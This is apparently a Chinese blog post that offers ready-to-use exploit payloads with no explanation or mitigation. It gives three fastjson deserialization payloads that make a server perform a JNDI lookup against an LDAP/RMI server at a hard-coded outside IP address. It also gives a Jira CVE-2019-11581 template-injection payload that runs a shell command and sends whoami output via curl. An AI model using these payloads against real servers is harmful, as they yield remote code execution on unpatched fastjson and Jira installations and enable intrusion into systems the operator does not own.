fastjson poc And CVE-2019–11581

未分类 Admin 7个月前 (07-08) 392次浏览 0个评论

fastjson poc

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://139.196.103.119:9999/obj","autoCommit":true}

{"@type":"com.mchange.v2.c3p0.JndiRefForwardingDataSource","jndiName":"ldap://139.196.103.119:9999/obj","loginTimeout":0}

<1.2.48
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://139.196.103.119:9999/teset","autoCommit":true}},age:11}

CVE-2019–11581

RCE in Jira(CVE-2019–11581)

Poc:
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://127.0.0.1:8080/`whoami`').waitFor()

喜欢 (2)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址